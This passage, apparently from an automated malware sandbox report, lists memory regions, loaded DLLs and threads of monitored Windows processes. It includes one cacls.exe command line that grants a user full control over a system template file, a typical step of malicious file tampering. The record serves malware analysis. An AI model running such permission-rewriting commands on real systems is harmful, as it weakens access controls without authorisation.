start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 7226 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 7227 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 7228 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 7229 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 7230 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 7231 start_va = 0x1233240000 end_va = 0x12333cffff entry_point = 0x0 region_type = private name = "private_0x0000001233240000" filename = "" Region: id = 7312 start_va = 0x12333d0000 end_va = 0x1233706fff entry_point = 0x12333d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7313 start_va = 0x1231750000 end_va = 0x1231770fff entry_point = 0x1231750000 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 7314 start_va = 0x1231a70000 end_va = 0x1231ac8fff entry_point = 0x1231a70000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 7315 start_va = 0x1233710000 end_va = 0x1233925fff entry_point = 0x0 region_type = private name = "private_0x0000001233710000" filename = "" Region: id = 7316 start_va = 0x1233930000 end_va = 0x1233b40fff entry_point = 0x0 region_type = private name = "private_0x0000001233930000" filename = "" Region: id = 7317 start_va = 0x1233240000 end_va = 0x123334afff entry_point = 0x0 region_type = private name = "private_0x0000001233240000" filename = "" Region: id = 7318 start_va = 0x12333c0000 end_va = 0x12333cffff entry_point = 0x0 region_type = private name = "private_0x00000012333c0000" filename = "" Region: id = 7319 start_va = 0x1233b50000 end_va = 0x1233d6efff entry_point = 0x0 region_type = private name = "private_0x0000001233b50000" filename = "" Region: id = 7320 start_va = 0x1233d70000 end_va = 0x1233e7ffff entry_point = 0x0 region_type = private name = "private_0x0000001233d70000" filename = "" Region: id = 7349 start_va = 0x1231750000 end_va = 0x123178ffff entry_point = 0x0 region_type = private name = "private_0x0000001231750000" filename = "" Region: id = 7350 start_va = 0x1231a10000 end_va = 0x1231a10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001231a10000" filename = "" Region: id = 7351 start_va = 0x7ff7fc98e000 end_va = 0x7ff7fc98ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fc98e000" filename = "" Region: id = 7352 start_va = 0x1233e80000 end_va = 0x1233f37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001233e80000" filename = "" Region: id = 7353 start_va = 0x1231a10000 end_va = 0x1231a13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001231a10000" filename = "" Region: id = 7354 start_va = 0x7ffaf24b0000 end_va = 0x7ffaf24d1fff entry_point = 0x7ffaf24b0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 7355 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 7356 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 7372 start_va = 0x1231a20000 end_va = 0x1231a26fff entry_point = 0x0 region_type = private name = "private_0x0000001231a20000" filename = "" Region: id = 7373 start_va = 0x1231a30000 end_va = 0x1231a34fff entry_point = 0x1231a30000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 7374 start_va = 0x1231a40000 end_va = 0x1231a40fff entry_point = 0x1231a40000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 7375 start_va = 0x1231a50000 end_va = 0x1231a51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001231a50000" filename = "" Region: id = 7376 start_va = 0x7ffaecc30000 end_va = 0x7ffaecea3fff entry_point = 0x7ffaecc30000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 7377 start_va = 0x1231a70000 end_va = 0x1231a70fff entry_point = 0x1231a70000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 7378 start_va = 0x1231a80000 end_va = 0x1231a81fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001231a80000" filename = "" Region: id = 7402 start_va = 0x1231a70000 end_va = 0x1231a70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001231a70000" filename = "" Thread: id = 869 os_tid = 0x464 Thread: id = 871 os_tid = 0x428 Thread: id = 872 os_tid = 0xf58 Thread: id = 877 os_tid = 0x478 Process: id = "100" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x1aa9000" os_pid = "0xf5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "83" os_parent_pid = "0xe4c" cmd_line = "cacls \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\" /E /G CIiHmnxMn6Ps:F /C" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7199 start_va = 0x2d0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 7200 start_va = 0x2f0000 end_va = 0x2f1fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 7201 start_va = 0x300000 end_va = 0x313fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 7202 start_va = 0x320000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 7203 start_va = 0x360000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 7204 start_va = 0x3a0000 end_va = 0x3a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 7205 start_va = 0xd70000 end_va = 0xd79fff entry_point = 0xd70000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\SysWOW64\\cacls.exe" (normalized: "c:\\windows\\syswow64\\cacls.exe") Region: id = 7206 start_va = 0xd80000 end_va = 0x4d7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d80000" filename = "" Region: id = 7207 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7208 start_va = 0x7f830000 end_va = 0x7f852fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f830000" filename = "" Region: id = 7209 start_va = 0x7f853000 end_va = 0x7f853fff entry_point = 0x0 region_type = private name = "private_0x000000007f853000" filename = "" Region: id = 7210 start_va = 0x7f85b000 end_va = 0x7f85dfff entry_point = 0x0 region_type = private name = "private_0x000000007f85b000" filename = "" Region: id = 7211 start_va = 0x7f85e000 end_va = 0x7f85efff entry_point = 0x0 region_type = private name = "private_0x000000007f85e000" filename = "" Region: id = 7212 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7213 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7214 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 7215 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7216 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 7217 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 7218 start_va = 0x3c0000 end_va = 0x3c1fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 7251 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 7252 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7253 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7254 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7255 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7256 start_va = 0x4f0000 end_va = 0x61ffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 7257 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7258 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7259 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 7260 start_va = 0x7f730000 end_va = 0x7f82ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f730000" filename = "" Region: id = 7357 start_va = 0x3d0000 end_va = 0x48dfff entry_point = 0x3d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7358 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7359 start_va = 0x490000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 7360 start_va = 0x620000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 7361 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 7362 start_va = 0x7f858000 end_va = 0x7f85afff entry_point = 0x0 region_type = private name = "private_0x000000007f858000" filename = "" Region: id = 7363 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7364 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7365 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7366 start_va = 0x2e0000 end_va = 0x2e3fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 7367 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7368 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7369 start_va = 0x74650000 end_va = 0x74677fff entry_point = 0x74650000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 7370 start_va = 0x660000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 7371 start_va = 0x2f0000 end_va = 0x2f3fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 7400 start_va = 0x6b0000 end_va = 0x9e6fff entry_point = 0x6b0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7401 start_va = 0x4d0000 end_va = 0x4d1fff entry_point = 0x4d0000 region_type = mapped_file name = "cacls.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cacls.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cacls.exe.mui") Thread: id = 874 os_tid = 0x424 Thread: id = 879 os_tid = 0x918 Process: id = "101" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x6b649000" os_pid = "0x998" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "40" os_parent_pid = "0x240" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xe], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b566" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 7335 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7336 start_va = 0x6494370000 end_va = 0x649438ffff entry_point = 0x0 region_type = private name = "private_0x0000006494370000" filename = "" Region: id = 7337 start_va = 0x6494390000 end_va = 0x64943a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006494390000" filename = "" Region: id = 7338 start_va = 0x64943b0000 end_va = 0x649442ffff entry_point = 0x0 region_type = private name = "private_0x00000064943b0000" filename = "" Region: id = 7339 start_va = 0x6494430000 end_va = 0x6494433fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006494430000" filename = "" Region: id = 7340 start_va = 0x7df5ff120000 end_va = 0x7ff5ff11ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff120000" filename = "" Region: id = 7341 start_va = 0x7ff702440000 end_va = 0x7ff702462fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff702440000" filename = "" Region: id = 7342 start_va = 0x7ff70246c000 end_va = 0x7ff70246dfff entry_point = 0x0 region_type = private name = "private_0x00007ff70246c000" filename = "" Region: id = 7343 start_va = 0x7ff70246e000 end_va = 0x7ff70246efff entry_point = 0x0 region_type = private name = "private_0x00007ff70246e000" filename = "" Region: id = 7344 start_va = 0x7ff702dc0000 end_va = 0x7ff702e3efff entry_point = 0x7ff702dc0000 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 7345 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7347 start_va = 0x6494440000 end_va = 0x6494440fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006494440000" filename = "" Region: id = 7348 start_va = 0x6494450000 end_va = 0x6494451fff entry_point = 0x0 region_type = private name = "private_0x0000006494450000" filename = "" Region: id = 7414 start_va = 0x6494590000 end_va = 0x649468ffff entry_point = 0x0 region_type = private name = "private_0x0000006494590000" filename = "" Region: id = 7415 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7416 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7417 start_va = 0x6494370000 end_va = 0x649437ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006494370000" filename = "" Region: id = 7418 start_va = 0x7ff702340000 end_va = 0x7ff70243ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff702340000" filename = "" Region: id = 7419 start_va = 0x6494460000 end_va = 0x649451dfff entry_point = 0x6494460000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7420 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7421 start_va = 0x6494690000 end_va = 0x649470ffff entry_point = 0x0 region_type = private name = "private_0x0000006494690000" filename = "" Region: id = 7422 start_va = 0x7ff70246a000 end_va = 0x7ff70246bfff entry_point = 0x0 region_type = private name = "private_0x00007ff70246a000" filename = "" Region: id = 7423 start_va = 0x7ffae9490000 end_va = 0x7ffae9587fff entry_point = 0x7ffae9490000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 7424 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 7425 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7426 start_va = 0x7ffae92d0000 end_va = 0x7ffae92e5fff entry_point = 0x7ffae92d0000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 7427 start_va = 0x7ffaef560000 end_va = 0x7ffaef5defff entry_point = 0x7ffaef560000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 7428 start_va = 0x6494380000 end_va = 0x6494386fff entry_point = 0x0 region_type = private name = "private_0x0000006494380000" filename = "" Region: id = 7429 start_va = 0x7ffaf7560000 end_va = 0x7ffaf75c8fff entry_point = 0x7ffaf7560000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7430 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7431 start_va = 0x7ffaf7680000 end_va = 0x7ffaf7687fff entry_point = 0x7ffaf7680000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7432 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 7433 start_va = 0x6494710000 end_va = 0x649478ffff entry_point = 0x0 region_type = private name = "private_0x0000006494710000" filename = "" Region: id = 7434 start_va = 0x6494520000 end_va = 0x6494526fff entry_point = 0x0 region_type = private name = "private_0x0000006494520000" filename = "" Region: id = 7437 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7438 start_va = 0x6494790000 end_va = 0x6494ac6fff entry_point = 0x6494790000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7439 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7440 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7441 start_va = 0x6494ad0000 end_va = 0x6494c57fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006494ad0000" filename = "" Region: id = 7442 start_va = 0x6494c60000 end_va = 0x6494de0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006494c60000" filename = "" Region: id = 7443 start_va = 0x6494df0000 end_va = 0x6494eaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006494df0000" filename = "" Region: id = 7444 start_va = 0x6494530000 end_va = 0x6494530fff entry_point = 0x0 region_type = private name = "private_0x0000006494530000" filename = "" Region: id = 7445 start_va = 0x6494540000 end_va = 0x6494540fff entry_point = 0x0 region_type = private name = "private_0x0000006494540000" filename = "" Region: id = 7446 start_va = 0x6494550000 end_va = 0x6494554fff entry_point = 0x6494550000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 7447 start_va = 0x6494eb0000 end_va = 0x6494f85fff entry_point = 0x6494eb0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 7448 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 7449 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 7458 start_va = 0x6494560000 end_va = 0x6494560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006494560000" filename = "" Region: id = 7459 start_va = 0x6494eb0000 end_va = 0x6494f2ffff entry_point = 0x0 region_type = private name = "private_0x0000006494eb0000" filename = "" Region: id = 7460 start_va = 0x7ff702468000 end_va = 0x7ff702469fff entry_point = 0x0 region_type = private name = "private_0x00007ff702468000" filename = "" Region: id = 7461 start_va = 0x6494f30000 end_va = 0x649502ffff entry_point = 0x0 region_type = private name = "private_0x0000006494f30000" filename = "" Region: id = 7462 start_va = 0x6494570000 end_va = 0x6494570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006494570000" filename = "" Region: id = 7463 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 7464 start_va = 0x6494580000 end_va = 0x6494580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000006494580000" filename = "" Region: id = 7485 start_va = 0x7ffae9fa0000 end_va = 0x7ffae9fb0fff entry_point = 0x7ffae9fa0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 7486 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = 